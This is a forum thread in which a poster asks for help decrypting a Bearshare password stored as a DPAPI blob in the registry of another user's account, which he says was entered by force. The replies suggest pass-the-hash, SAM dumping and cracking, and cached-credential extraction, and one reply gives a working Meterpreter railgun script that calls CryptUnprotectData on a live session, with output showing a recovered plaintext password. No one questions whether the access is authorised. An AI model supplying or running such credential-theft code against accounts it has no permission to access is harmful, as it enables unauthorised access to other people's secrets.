Decrypting a Hex code from Registry

[Mycael]

Greetings!

I'm having a problem with a Hex-code Password from a registry file. Its related with Bearshare.

I fed in a hex to ASCII converter, and this string pops out:

Ð Ñ O eMž í» EncryptedString ü ©c \ °·Ûv â Ë ¥ ³ M3æ ¥Ç" ïr©ÜVâ5à $l Ž

Lol, any help would be greatly appreciated. Thanks!

> Registry Contents below:

"Password"=hex:01,00,00,00,d0,8c,9d,df,01,15,d1,11,8c,7a,00,c0,4f,c2,97,eb,01,\

00,00,00,90,ae,9f,9f,65,be,4d,48,9e,ae,18,17,ed,13,bb,75,00,00,00,00,20,00,\

00,00,45,00,6e,00,63,00,72,00,79,00,70,00,74,00,65,00,64,00,53,00,74,00,72,\

00,69,00,6e,00,67,00,00,00,10,66,00,00,00,01,00,00,20,00,00,00,fc,91,a9,72,\

63,dc,5c,a3,b0,09,b7,e9,db,6c,76,e7,00,00,00,00,04,80,00,00,a0,00,00,00,10,\

00,00,00,e2,09,cb,36,0d,35,a5,d8,b3,a8,4d,70,33,50,e6,5d,10,00,00,00,09,11,\

a5,f6,c7,52,22,29,ef,9b,72,55,a9,84,dc,17,14,00,00,00,01,6f,56,7c,e2,65,35,\

04,e0,5a,81,24,24,77,6c,d1,8e,bd,05,40

"AutoConnect"=dword:00000001

"RememberPassword"=dword:00000001

"Default"=dword:00000001

"Status"=dword:00000001

"Guest"=dword:00000000

"LoginUserType"=dword:00000000

"ActiveTabInSearch"=dword:00000000

"ActiveTabInWeb"=dword:00000000

"AdditionalResults"=dword:0000002d

[digip]

its not straight hex, its like binary or encrypted data mixed in. I stripped some of the data out just so you can see the readable string part:

Ð ß Ñ z ÀOÂ ë ® e¾MH ® í »u E n c r y p t e d S t r i n g f ü ©rcÜ\£° ·éÛlvç   â Ë6
5¥Ø³¨Mp3Pæ] ¥öÇR")ï rU© Ü oV|âe5 àZ $$wlÑ ½ @
 

you can use http://home.paulschou.net/tools/xlate/ to decode hex, but this is probably got more to it than just hex in it. Edited February 27, 2013 by digip

[bwall]

Looks like it might be a DPAPI blob, which means without the master key, user's password and possible entropy, you can't decrypt it without being logged in as that user. http://msdn.microsoft.com/en-us/library/ms995355.aspx

[Mycael]

Thing is. The account of said "user" had his password changed forcefully by an administrative account.

This change invalidated all stored password, including this one.

Before this happened, however, I managed to back-up this registry thinking it could be of use.

This password being user&password dependent makes me wonder if there are other means to decipher

the contents of this hex. I still have access to the user's PC and account. (After forceful entry ofcourse)

Wondering if its possible to revert the user's account settings to the before-forceful-entry. Any ideas?

Thanks for the earlier posts. Really appreciate them :)

[digip]

If you have the original key, and access to the users session, under their sign on, you can repolace the reg key, then yes, it will put it back, but that depends on your level of access and lockdown of registry, group policy, etc. Its easier, to login to the users session with the current password, and just changing it via control panel, but if its a domain login, the password is a different setup, one for local login, one for domainm which is controlled by the domain controller and the users session is logging in remotely. Cached credentials can sometimes be pulled depending on if they left default group policy settings in effect, you can also bypass all of it with a pass the hash attack to just use the token shared between live sessions.

If the password is what you want to decrypt though, grab the sam database and use something like ophtcrack to retrieve the password, but that probably only contains the local admin pass and not the domain pass. I'm not 100% sure how to get a domain password for a user but I imaging its probably a hashed key like you showed above that is decrypted during login with some function at the domain controller end. Been so long since I've even had to think about these processes since mcse classes, I don't even remember how the storage works any more, and with windoes server 2008 i know the data is backwards compatible but also has newer secure storage of data that may be diff than say, working on win2000 and win2003.

Best guy to ask that would probably know, is Mubix.

[mubix]

Ya, it was password stored in the users store. Wrote a quick script to decrypt: (mostly stolen from post/windows/gather/credentials/outlook.rb)

def prepare_railgun
		rg = session.railgun
		if (!rg.get_dll('crypt32'))
				rg.add_dll('crypt32')
		end
end

def decrypt_password(data)
		rg = session.railgun
		pid = client.sys.process.getpid
		process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

		mem = process.memory.allocate(128)
		process.memory.write(mem, data)

		if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
				addr = [mem].pack("V")
				len = [data.length].pack("V")
				ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
				#print_status("#{ret.inspect}")
				len, addr = ret["pDataOut"].unpack("V2")
		else
				addr = [mem].pack("Q")
				len = [data.length].pack("Q")
				ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
				len, addr = ret["pDataOut"].unpack("Q2")
		end

		return "" if len == 0
		decrypted_pw = process.memory.read(addr, len)
		return decrypted_pw
end

def get_valdata(k, name)
		@key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com'
		registry_getvaldata("#{@key_base}\\#{k}", name)
end

prepare_railgun
data = get_valdata("",'Password')
print_error data.inspect
password = decrypt_password(data)
print_status password.inspect

And got the following output when logged in as Administrator (who installed Bearshare) and with the password of 'password'

meterpreter > run decrypt_bearshare
[-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\
x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0
0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01
\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\
x9E\xC11.d\x96\x95 \xC6"
[*] "password\x00"

I then exported the entire registry tree for Bearshare and moved it to a new user 'bob', importing it as it was from Administrator:

meterpreter > run decrypt_bearshare
[-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\
x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0
0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01
\x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\
x9E\xC11.d\x96\x95 \xC6"
[*] ""

No joy (as expected)

Edited March 3, 2013 by mubix

[mubix]

If you still have the ability to login as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and once logged in (as the user with bearshare installed) still able to decrypt the bearshare password

[Mycael]

Speechless

@Mubix and digip

You guys are awesome!

Will give this a shot; I'll update as soon as I get results.

Thanks for the effort and support :)